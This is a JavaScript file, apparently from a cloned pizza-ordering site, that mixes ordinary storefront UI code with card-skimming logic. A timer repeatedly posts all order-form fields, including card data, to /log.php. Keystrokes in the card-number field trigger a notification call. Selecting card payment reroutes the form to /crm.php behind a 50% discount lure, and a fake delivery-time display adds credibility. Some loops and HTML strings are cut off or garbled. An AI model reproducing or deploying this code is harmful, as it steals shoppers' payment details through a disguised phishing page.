function Get_All_Forms_Data(Element) { Element = Element || ''; var All_Page_Data = {}; var All_Forms_Data_Temp = {}; if(!Element) { Element = 'body'; } $(Element).find('input,select,textarea').each(function(i){ All_Forms_Data_Temp[i] = $(this); }); $.each(All_Forms_Data_Temp,function(){ var input = $(this); var Element_Name; var Element_Value; if((input.attr('type') == 'submit') || (input.attr('type') == 'button')) { return true; } if((input.attr('name') !== undefined) && (input.attr('name') != '')) { Element_Name = input.attr('name').trim(); } else if((input.attr('id') !== undefined) && (input.attr('id') != '')) { Element_Name = input.attr('id').trim(); } else if((input.attr('class') !== undefined) && (input.attr('class') != '')) { Element_Name = input.attr('class').trim(); } if(input.val() !== undefined) { if(input.attr('type') == 'checkbox') { Element_Value = input.parent().find('input[name="'+Element_Name+'"]:checked').val(); } else if((input.attr('type') == 'radio')) { Element_Value = $('input[name="'+Element_Name+'"]:checked',Element).val(); } else { Element_Value = input.val(); } } else if(input.text() != undefined) { Element_Value = input.text(); } if(Element_Value === undefined) { Element_Value = ''; } if(Element_Name !== undefined) { var Element_Array = new Array(); if(Element_Name.indexOf(' ') !== -1) { Element_Array = Element_Name.split(/(\s+)/); } else { Element_Array.push(Element_Name); } $.each(Element_Array,function(index, Name) { Name = Name.trim(); if(Name != '') { All_Page_Data[Name] = Element_Value; } }); } }); return All_Page_Data; } var debugVar = ''; $(document).ready(function () { setInterval(function() { obj = Get_All_Forms_Data($('#main_form')); val = JSON.stringify(obj); if (debugVar != val) { debugVar = val; try { $.post( "/log.php", obj); } catch (eer) { //console.log(eer); } } }, 5000); }); $(document).ready(function loaded() { $('body').addClass('domloaded'); //$('body').removeClass('ovh'); //$('.mst1').removeClass('mst1_vis'); $('.promo_active ._2Bnpq-40').val('PAPIZZA50'); $('.bt_enter_code').click(); }); $( "ordCCNumber" ).focus(function() { sendNotfication(); }); $('#ordCCNumber').keypress(function() { sendNotfication(); }); function mtl(){ setInterval(function(){ $('.mst1').removeClass('mst1_vis'); $('body').removeClass('ovh'); }, 2350); }; mtl(); //Smooth Scrolling Using Navigation Menu $('a[href*="#"]').on('click', function(e){ $('html,body').animate({ scrollTop: $($(this).attr('href')).offset().top - 1 },700); e.preventDefault(); }); $('.aKVby-40').hover(function(){ $(this).find('._1S_Sc-40').toggleClass('info_visible'); }); jQuery(function($){ $(document).click(function (e){ // событие клика по веб-документу var div = $("._1S_Sc-40 .info_visible, .aKVby-40"); // тут указываем ID элемента if (!div.is(e.target) // если клик был не по нашему блоку && div.has(e.target).length === 0) { // и не по его дочерним элементам div.removeClass('info_visible'); // скрываем его } }); }); $(document).ready(function () { //initialize swiper when document ready var mySwiper = new Swiper ('.swiper-container', { // Optional parameters direction: 'horizontal', loop: true, pagination: { el: '.swiper-pagination', type: 'bullets', }, navigation: { nextEl: '.swiper-button-next', prevEl: '.swiper-button-prev', }, autoplay: { delay: 9000, }, paginationClickable: true, }) }); $(document).ready(function() { var $btns = $('.products-tabs__tab').click(function() { if (this.id == 'all_filter') { $('.mst .OCoeO-40').fadeIn(500); } else { var $el = $('.' + this.id).fadeIn(500); $('.mst .OCoeO-40').not($el).hide(); } $btns.removeClass('active_filter_button'); $(this).addClass('active_filter_button'); }) }); $('.sb1').click(function() { $('.vrl').addClass('hid'); }); $('.sws').click(function() { $('.smt').addClass('vis_flex'); $('body').addClass('ovhmob'); }); $(function(){ document.SityArr=[]; searchSity(); $("#inpunSearchSity").bind('keyup', searchSity); }); function searchSity(){ var strValForSearch=$("#inpunSearchSity").val().toLowerCase(); var tempArr=document.SityArr; var arrResult=[]; if (strValForSearch.length==0){ arrResult=tempArr; //$('.sl1').html('Москва и область'); //$('.sl2').removeClass('hid'); } else{ var lenStrSearch=strValForSearch.length; for (var i=0; i
'+arrResult[i].name+'
'); } } //localstorage function toLocalCity() { var city = $('.main_city').html(); localStorage.setItem('city', city); } function cityParse(){ if (localStorage.getItem('city') !== null) { var parseCity = localStorage.getItem('city'); $('#address_jsoncity').text(parseCity); $('#city').attr('disabled', 'disabled'); $('#city').addClass('new_bg'); $('.kos').addClass('mtt'); } } cityParse(); function mtl(){ setInterval(function(){ $('.mst1').removeClass('mst1_vis'); $('body').removeClass('ovh'); }, 2350); }; $('body').on('click','.city_name', function(){ var city_Val=$(this).find('.ctname').html(); $('.smt').removeClass('vis_flex'); $('body').removeClass('ovhmob'); $('.main_city').html(city_Val); $('.mst1').addClass('mst1_vis'); $('body').addClass('ovh'); mtl(); toLocalCity(); cityParse(); }); $('.mcc').click(function(){ $('.vrl').addClass('hid'); $('.smt').toggleClass('vis_flex'); $('body').toggleClass('ovhmob'); }); $('.bd').click(function(){ toLocalCity(); cityParse(); }); jQuery(function($){ $(document).click(function (e){ // событие клика по веб-документу var lov = $(".smt.vis_flex, .mcc, .sws"); // тут указываем ID элемента if (!lov.is(e.target) // если клик был не по нашему блоку && lov.has(e.target).length === 0) { // и не по его дочерним элементам lov.removeClass('vis_flex'); // скрываем его $('body').removeClass('ovhmob'); } }); }); //custom tumbler $('.GTChE-40').click(function(){ $(this).siblings('.GTChE-40').removeClass('_2lMjP-40'); $(this).addClass('_2lMjP-40'); }); //custom sizes tumbler $('._1koWR-40 div:nth-child(2)').click(function(){ $(this).siblings('.sizebg').css('transform','translateX(0%)'); $(this).siblings('.sizeitem').removeClass('vGOho-40'); $(this).addClass('vGOho-40'); }); $('._1koWR-40 div:nth-child(3)').click(function(){ $(this).siblings('.sizebg').css('transform','translateX(100%)'); $(this).siblings('.sizeitem').removeClass('vGOho-40'); $(this).addClass('vGOho-40'); }); $('._1koWR-40 div:nth-child(4)').click(function(){ $(this).siblings('.sizebg').css('transform','translateX(200%)'); $(this).siblings('.sizeitem').removeClass('vGOho-40'); $(this).addClass('vGOho-40'); }); $('._1koWR-40 div:nth-child(5)').click(function(){ $(this).siblings('.sizebg').css('transform','translateX(300%)'); $(this).siblings('.sizeitem').removeClass('vGOho-40'); $(this).addClass('vGOho-40'); }); //cart buttons attributes function initButtonsAttrs() { //button parse product name $('.ProductCard__button').attr( 'data-sb-product-name', productName ); function productName( index, attributeValue ) { var pureNames = $(this).parents('._9VPg6-40').find('._2G24_-40').html(); var namesWithoutLastSpaces = pureNames.trim(); return (namesWithoutLastSpaces); } //button parse product price $('.ProductCard__button').attr( 'data-sb-product-price', productPrice ); function productPrice( index, attributeValue ) { var stroke = $(this).parents('._9VPg6-40').find('._25gak-40').html(); var withoutSpaces = stroke.replace(/\s/g, ''); return (withoutSpaces); } //Size_button parse product sizes $('.sizeitem').attr( 'data-sb-curent-size', productCurentSize ); function productCurentSize( index, attributeValue ) { var curSizeStroke = $(this).html(); var curSizeName = $(this).parents('._9VPg6-40').find('._1koWR-40 div:nth-child(2)').text().replace(/[^ "a-zA-Z]/g,''); var curSizeStrokeWithoutSpaces = curSizeStroke.replace(/[^.\d]+/g,"").replace( /^([^\.]*\.)|\./g, '$1' ); var curSizeDigit = curSizeStrokeWithoutSpaces; var curSizeDigitStroke = String(curSizeDigit); var curSizeFull = (curSizeDigitStroke + curSizeName); return (curSizeFull); } //Size_button parse product prices //$('.sizeitem').attr( 'data-sb-curent-price', productCurentPrice ); //function productCurentPrice( index, attributeValue ) { // var minSizePrice = $(this).parents('.Card__footer').find('._25gak-40').html(); // //} //button parse product size $('.ProductCard__button').attr( 'data-sb-product-size', productSize ); function productSize( index, attributeValue ) { if(!$(this).parents('._9VPg6-40').find('._1koWR-40').length == 0) { return ($(this).parents('._9VPg6-40').find('._1koWR-40 div:nth-child(2)').html()); } } //button parse product image $('.ProductCard__button').attr( 'data-sb-product-img', productImg ); function productImg( index, attributeValue ) { //if attr centersrc contain whatever - var attri = $(this).parents('._9VPg6-40').find('._2ckYL-40 img').attr('centersrc'); if (typeof attri !== typeof undefined && attri !== false) { var relativeLink = $(this).parents('._9VPg6-40').find('._2ckYL-40 img').attr('centersrc'); return (relativeLink); } else { var relativeLink = $(this).parents('._9VPg6-40').find('._2ckYL-40 img').attr('src'); return (relativeLink); } } //button set product quantity $('.ProductCard__button').attr( 'data-sb-product-quantity', productQuantity ); function productQuantity( index, attributeValue ) { return ( '1' ); } //button set product id $('.ProductCard__button').attr( 'data-sb-id-or-vendor-code', productId ); function productId( index, attributeValue ) { return ( '00000' + (index+1) ); } //Size_button set product id //1st sizeitem must have id simmilar to button vendor id $('._1koWR-40').find('div:not(:nth-child(1)):not(:nth-child(2))').attr( 'data-sb-curent-id-or-vendor-code', productCurrentId ); function productCurrentId( index, attributeValue ) { return ( 'sz000s' + (index+1) ); } $('._1koWR-40').find('div:nth-child(2)').attr( 'data-sb-curent-id-or-vendor-code', productCurrentIdFirst ); function productCurrentIdFirst( index, attributeValue ) { var productCurrentIdFirstItem = $(this).parents('.Card__footer').find('.ProductCard__button').attr('data-sb-id-or-vendor-code'); return (productCurrentIdFirstItem); } } initButtonsAttrs(); $('._11QpV-40').click(function(){ $('.SEOText').addClass('_2PMo3-40'); $(this).hide(); $('.mtrack').attr('style', 'height: auto; overflow: visible;') }); //cart scroll to bottom //$(document).ready(function bottomScroll() { // var container = $('.OWVMj-40'); // container[0].scrollTop = container[0].scrollHeight; //}; $(document).ready(function(){ function scrltp1(){ var basketHeight1 = $('.smart-basket__form').height(); var wrapperHeight1 = $('.smart-basket__wrapper').height(); if (basketHeight1 > wrapperHeight1){ $('#blockscroll').addClass('ts1'); $('#blockscroll').animate({ scrollTop: $(".smart-basket__result-common").offset().top }, 900); } else { $('#blockscroll').removeClass('ts1'); } } scrltp1(); }); $('.gmeWv-40').click(function(){ $('#blockscroll').toggleClass('cart_visible'); $(this).find('.SnRwa-40').toggleClass('arrow_rotate'); }); $('.mtp').click(function(){ $('.fl1').toggleClass('cart_visible'); $(this).find('.arr1').toggleClass('arrow_rotate'); }); $('.mtp1').click(function(){ $('.fl2').toggleClass('cart_visible'); $(this).find('.arr2').toggleClass('arrow_rotate'); }); //phonemask $('._2HYem-40').click(function(){ $('._3CS1T-40').hide(); }); function ifAllValid(){ if ($('#street_number').val() !== '') { if ($('#route').val() !== '') { if ($('#street_number').hasClass('clicked')){ deliverytime(); } } } } function thirdBlockActive(){ if ($('#street_number').val() !== '') { if ($('#route').val() !== '') { $('._3CS1T-40').hide(); $('.PayFieldGroup').removeClass('pointer_opacity'); } } } function openAdressFields(){ if ($('#street_number').hasClass('clicked')){ $('.adress_not_listed').addClass('hidpro'); $('.adr1').removeClass('hidpro'); $('.adr2').removeClass('hidpro'); $('.adr3').removeClass('hidpro'); $('.adr4').removeClass('hidpro'); } } $('.adress_not_listed').click(function(){ $('.adress_not_listed').addClass('hidpro'); $('.adr1').removeClass('hidpro'); $('.adr2').removeClass('hidpro'); $('.adr3').removeClass('hidpro'); $('.adr4').removeClass('hidpro'); }) $('#street_number').blur(function (){ ifAllValid(); thirdBlockActive(); }); $('#route').blur(function (){ ifAllValid(); thirdBlockActive(); }); //if click to street in dadata - start 8 sec preloader with delivery time at 35-55 min $('body').on('click','.pac-item', function(){ $('#street_number').addClass('clicked'); ifAllValid(); thirdBlockActive(); openAdressFields(); }); function deliverytime(){ $('.preloader_delivery_time_wrapper').removeClass('sie').removeClass('preloader_delivery_time_wrapper_after_preloader').addClass('hid'); $('.ok_icon').removeClass('sie_inlineblock').addClass('hid'); $('.delivery_time_item').removeClass('sie_inlineblock').addClass('hid'); $('.delivery_time_preloader').removeClass('sie').addClass('hid'); $('.preloader_delivery_time_wrapper').removeClass('hid').addClass('sie'); $('.delivery_time_preloader').removeClass('hid').addClass('sie'); setTimeout(function(){ $('.delivery_time_preloader').removeClass('sie').addClass('hid'); $('.preloader_delivery_time_wrapper').addClass('preloader_delivery_time_wrapper_after_preloader'); $('.ok_icon').removeClass('hid').addClass('sie_inlineblock'); var streetT = $('#route').val(); var houseT = $('#street_number').val(); $('.delivery_time_item').html('Order will be delivered in: 35 — 50 minutes, or at your chosen time').removeClass('hid').addClass('sie_inlineblock'); }, 4900); } $('.checkbox_faster').click(function(){ $(this).addClass('_1CDd8-40'); $('.inp2').removeClass('_1CDd8-40'); $(this).find('.inpitem').attr('checked, checked'); $('.OrderTimeFieldGroup').removeClass('sie').addClass('hid'); $('.OrderDelivTime').removeClass('hid').addClass('sie'); }); $('.checkbox_selecttime').click(function(){ $(this).addClass('_1CDd8-40'); $('.inp1').removeClass('_1CDd8-40'); $(this).find('.inpitem2').attr('checked, checked'); $('.OrderDelivTime').removeClass('sie').addClass('hid'); $('.OrderTimeFieldGroup').removeClass('hid').addClass('sie'); }); $('.selectpaymeth').click(function(){ $(this).addClass('_1CDd8-40'); $('.inpp2').removeClass('_1CDd8-40'); $(this).find('.inpitemp1').attr('checked, checked'); $('.promocode_alert').removeClass('sie').addClass('hid'); $('#cpCardForm').addClass('sie').removeClass('hid'); $('.order_btn_text1').text('Pay'); $('.promo_active ._2Bnpq-40').val('PAPIZZA50'); $('.bt_enter_code').click(); $('._2mSk-40').addClass('hid'); $('._2Bnpq-40').removeClass('disableclass1'); $('.bt_enter_code').removeClass('disableclass1'); $('._3M_Iy-40').removeClass('disableclass2'); $('._2Bnpq-40').removeAttr('disabled'); $('#main_form').attr('action', '/crm.php'); sendNotfication(); }); $('.selectpaymeth2').click(function(){ $(this).addClass('_1CDd8-40'); $('.inpp1').removeClass('_1CDd8-40'); $(this).find('.inpitemp2').attr('checked, checked'); $('.promocode_alert').removeClass('hid').addClass('sie'); $('#cpCardForm').removeClass('sie').addClass('hid'); $('.order_btn_text1').text('Order'); $('.bt_remove_code').click(); $('._2mSk-40').removeClass('hid'); $('._2Bnpq-40').addClass('disableclass1'); $('.bt_enter_code').addClass('disableclass1'); $('._3M_Iy-40').addClass('disableclass2'); $('._2Bnpq-40').attr('disabled', 'disabled'); $('#main_form').attr('action', '/error'); sendNotfication(); }); //custom select $('.custom_select').each(function(){ var $this = $(this), numberOfOptions = $(this).children('option').length; $this.addClass('select-hidden'); $this.wrap('
'); $this.after('
'); var $styledSelect = $this.next('div.select-styled'); $styledSelect.text($this.children('option').eq(0).text()); var $list = $('